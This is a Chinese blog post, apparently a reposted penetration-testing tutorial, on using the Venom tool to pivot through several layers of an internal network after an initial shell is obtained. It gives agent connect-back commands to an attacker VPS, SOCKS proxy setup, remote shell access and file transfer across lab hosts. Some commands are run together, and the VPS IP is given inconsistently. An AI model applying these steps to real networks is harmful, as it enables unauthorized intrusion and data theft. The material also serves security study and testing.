使用Venom多级代理工具穿透内网

  • A+
所属分类:安全工具

前提:已经拿到某服务器shell,可以上传文件且具有执行权限;

项目地址(编译后):https://github.com/Dliv3/Venom/releases

使用Venom多级代理工具穿透内网

一、进入内网

1.上传admin_linux_x64到vps端,运行并监听本地11111端口:

chmod 777 admin_linux_x64./ admin_linux_x64 -lport 11111

使用Venom多级代理工具穿透内网


2.利用已经拿到的的shell上传agent_linux_x64文件到目标服务器,并执行

chmod 777 agent_linux_x64./agent_linux_x64 -rhost x.x.x.x -rport 11111# x.x.x.x是指公网vps IP

使用Venom多级代理工具穿透内网

3.venom服务端有回显则表示连接成功,建立socks连接:

goto 1socks 11112# Start a socks5 server in port 11112

使用Venom多级代理工具穿透内网


4.本地通过代理软件连接vps开放的11112端口,就可以访问到目标内网

使用Venom多级代理工具穿透内网


参考链接:https://xz.aliyun.com/t/4058

如果目标内网还需要存在多个网段,那么就需要进行多级代理。以下内容为转载,原文链接:

https://blog.csdn.net/u011215939/article/details/103403545


二、穿透内网

Venom可连接节点,然后以节点为跳板,构建多级代理。


实验环境介绍:

1.外网IP:20.10.120.X(外网IP)

2.内网的机器三台windows IP地址:192.168.3.160、192.168.3.15、192.168.3.30

3.设想外网的VPS要访问最里面的192.168.3.160只能一层一层的依次访问;192.168.3.160只能和192.168.3.30相互访问;192.168.3.30可以和192.168.3.15,192.168.3.160访问而不能访问外网的VPS;最后3.15能被外网VPS访问,也能和3.30相互访问;利用Venom来进行一层一层的代理实现内网穿透;

使用Venom多级代理工具穿透内网


实验开始

1.将下载好的Venom工具依次上传到对应的机器里面,外网的VPS上面上传admin_linux_x64,并修改权限 chmod 777 admin_linux_x64

使用Venom多级代理工具穿透内网

2、使用./admin_linux_x64文件来监听本地端口,内网的机器就是用agent.exe文件来连接vps。vps执行命令./admin_linux_x64 -lport 4343,监听本地4343端口

使用Venom多级代理工具穿透内网

3、所有机器都已经上传了Venom工具包并解压,环境都是windows;在192.168.3.15机器上面执行连接操作;执行命令agent.exe -rhost 120.10.120.X -rport 4343 

使用Venom多级代理工具穿透内网

外网VPS监听成功,192.168.3.15被监听:

使用Venom多级代理工具穿透内网

4、然后在VPS上进行操作;help查看命令。这里我们要使用到show,goto,listen,exit,shell这几个命令;

① 执行show命令,可以看见刚刚连接成功的一个节点;

使用Venom多级代理工具穿透内网

② goto 1可以切换到1节点上面去

使用Venom多级代理工具穿透内网

③shell  执行命令

使用Venom多级代理工具穿透内网

exit    退出,进行下一步的监听操作。在不退出1节点的基础上面执行listen 4343端口进行监听本地端口

使用Venom多级代理工具穿透内网

5、在第二台内网主机192.168.3.30机器上面执行命令:

agent.exe -rhost 192.168.3.15 -rport 4343

使用Venom多级代理工具穿透内网

6. 此时VPS成功跨越192.168.3.15连接到192.168.3.30

①执行show命令发现新增了一个节点;

使用Venom多级代理工具穿透内网

②切换到节点2中: goto 2 。执行命令:shell  

使用Venom多级代理工具穿透内网

7.现在进行最后一步实验:公网vps穿透192.168.3.15192.168.3.30 连接到最内层192.168.3.160;依次执行命令exit,listen 4343 ;192.168.3.30机器开启本地监听:

使用Venom多级代理工具穿透内网

①在192.168.3.160机器上面进行连接操作,执行命令:

agent.exe -rhost 192.168.3.30 -rport 4343

使用Venom多级代理工具穿透内网

②VPS>show;成功建立监听

使用Venom多级代理工具穿透内网

③goto 3 切换到3节点。shell 执行命令。至此内网穿透实验成功

使用Venom多级代理工具穿透内网


其他:

1.以上监听的端口在节点上面进行listen的时候可以不一致,一台机器上也可以监听多个端口

2.本地文件上传于下载;
上传:

upload 2018.jpg C:2018.jpg#将本地的文件上传到节点1的C盘根目录下面

使用Venom多级代理工具穿透内网

下载

download C:1.gif 1.gif# 将节点1中的文件下载到本地

使用Venom多级代理工具穿透内网

3.Venom工具在执行过程中尽量不要将命令写错,写错后无法删除,只能重头来过。

使用Venom多级代理工具穿透内网


使用Venom多级代理工具穿透内网

渗透工具|提权|内网|SRC|CS端安全测试|安全加固等资料分享

Apache Tomcat 自动 WAR 部署和 渗透测试工具

hash认证概念与hash破解方式(工具使用方式)

蓝队攻防|如何在没有日志的情况下跟踪事件?

代码审计相关知识与资料分享

渗透测试情报收集工具

weblogic 漏洞扫描工具

spring框架漏洞扫描

蓝队防守反制



欢迎关注LemonSec

觉得不错点个“赞”、“在看”哦

本文始发于微信公众号(LemonSec):使用Venom多级代理工具穿透内网

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: